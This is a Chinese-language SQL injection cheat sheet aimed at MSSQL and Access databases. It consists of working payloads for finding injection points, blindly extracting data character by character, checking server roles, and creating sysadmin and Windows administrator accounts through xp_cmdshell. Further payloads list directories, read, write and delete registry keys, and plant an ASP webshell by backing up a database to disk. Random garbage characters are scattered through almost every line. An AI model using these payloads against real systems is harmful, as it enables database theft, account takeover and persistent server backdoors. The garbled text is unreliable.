1.判断是否有注入;and 1=1 ;and 1=2 ��C,�%D�p0
2.初步判断是否是mssql ;and user>0 ';}:*nZ//_
vE�1:;%�Q�
3.注入参数是字符'and [查询条件] and ''=' {NcJL< ;tS
CEBu[�TT/9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' T�hkC�KM�
-x:7K\=$SX
5.判断数据库系统 @=2�u�;$.�
�X]n`Y�F�7
;and (select count(*) from sysobjects)>0 mssql ��atW^^4�:
lHPnAaue�@
;and (select count(*) from msysobjects)>0 access n*i&o;�5��
y�Mzy!b Ky
i[MB�O`�FF
2
E?]!9T~|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 s];�0-6�5)
4sX?�O�4p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 )A6=P%;}>I
kw} E�0uY
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,% 'r:�@'�
%�Pl� |3�i
9.(1)猜字段的ascii值(access) N"��t�X� K
.3jijc�� j
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 L�E~vSm�^#
xwW(WH�dC]
(2)猜字段的ascii值(mssql) 4F6�I7lu��
�Pa#Jw��o
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �ic�3Szd^4
V��Kfpk^rU
10.测试权限结构(mssql) 1�<m�.Q�*
X�\w["!��B
}'��86�hnW
Nq^o�8q_��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��WnU2��.:
*_m���ER`�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- #T��8j�HnI
�f3^�qO9R
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- U>00�B|<GJ
�L_|iQwU�%
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
m5a'V�s�
�VC_F�
C�z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- u��hn�n�jI
X��D?]���+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- x�ls
US'Eo
HR�Q�fT>"/
;and 1=(select IS_MEMBER('db_owner'));-- 0v6Z�4Ahpo
\zBZ$5 rE
$P)�-o?eer
�QFN��9��j
11.添加mssql和系统的帐户 �n5ef�HJU�
{5H���Q=&�
;exec master.dbo.sp_addlogin username;-- UUM�:�*�X�
;exec master.dbo.sp_password null,username,password;-- m(�dW["8D
��;j[��gE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- (CtRU�����
gNZ"Kr o6
;exec master.dbo.xp_cmdshell 'net user username password �'/r�U�<.1
Os].
�IL$�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- j|qdf3^f�
@3 ���+� �
;exec master.dbo.xp_cmdshell 'net user username password /add';-- a+CJ�J3T-
j9w{=�( MV
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?5;wPDsK��
���x9�t�%�
.QA1'_��9�
;9-J�=@KY4
12.(1)遍历目录 oK<H/76��x
�Fi�7~JZZ
;create table dirs(paths varchar(100), id int) nB[B�
FVkU
�UF\k0oL�z
;insert dirs exec master.dbo.xp_dirtree 'c:\' SOMAs�'�=
m(�1ot� M9
;and (select top 1 paths from dirs)>0 "4T36���b
�YACx9K H�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !}�c\u����
cRC�ji^,KJ
u�I�NEq{yo
R%�t|R7�9I
(2)遍历目录 /qq�*"���R
mi5bk>�o�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6�/p9a�g�]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 P1�]F0�fR
n:?a=��xY�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��7T���U77
c=a�;<,Rzb
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �(�JE&1 @
;���NAKU��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e5lJ�)�_o
gdh|�X[d��
�9K�T85t1#
.)1u0 (?�
13.mssql中的存储过程 /��Tw $}�8
A�DP3N��ic
xp_regenumvalues 注册表根键, 子键 *+2BZ�ZwT�
Z^J)]U�L�/
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 .�lI���.I
P.�=Dd�"La
xp_regread 根键,子键,键值名 ��=%u=m�a;
CG J_��k?h
;exec xp_regread sebuuL.l0<
�nD�LiER;U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 5-'Z.[ImB?
j�d�"YaZOQ
xp_regwrite 根键,子键, 值名, 值类型, 值 Q&��PEO%/D
U�IZ�9"�Da
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �<~s�vy)Cz
�#"H<k(-Cz
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 P�p4��Q)2X
@�k�ba^�z
xp_regdeletevalue 根键,子键,值名 bI�k�4�?�S
bHTTx�Z-�%
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �X*b��OE�}
�o?3C��-A|
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 B �<�HD��
uMZ<i���}
�q��A25P<�
j�Cg4�$),b
14.mssql的backup创建webshell ��_?�bF;R�
�YW��8Od�m
use model P�8n�s @VV
?8<R)hJ�a<
create table cmd(str image); �'��k<~HQr
[Z1,~(3�
insert into cmd(str) values (''); C�s,t:aj�P
4�s <Z��KU
backup database model to disk='c:\l.asp'; y>�r^� �MQ
C
[8�='i26
jT-t�sQ .,
�^5FwYXAxi
15.mssql内置函数 '�(3|hh)Tl
;j�lI>;C;V
;and (select @@version)>0 获得Windows的版本号 )M�5�6v�yo
)G#O#�Yy��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa E-?JHJloU�
T\7t�#Z
�k
;and (select user_name())>0 爆当前系统的连接用户 COH�>B�1W@
�Ik�=bgE�F
;and (select db_name())>0 得到当前连接的数据库 A2`X��h#o�
�"`�[��4(j
Z22#lF\�N�
�e\*N Lj_(
16.简洁的webshell }��\W^$e-�
8�Urj;K�kD
use model 8`�WaUB��%
8ROZ]Xh,x
create table cmd(str image); ��1{h�,L�R
�T{F
'�Y%
insert into cmd(str) values (''); �sB'~=�1m^
N'%��l/���
backup database model to disk='g:\wwwtest\l.asp';
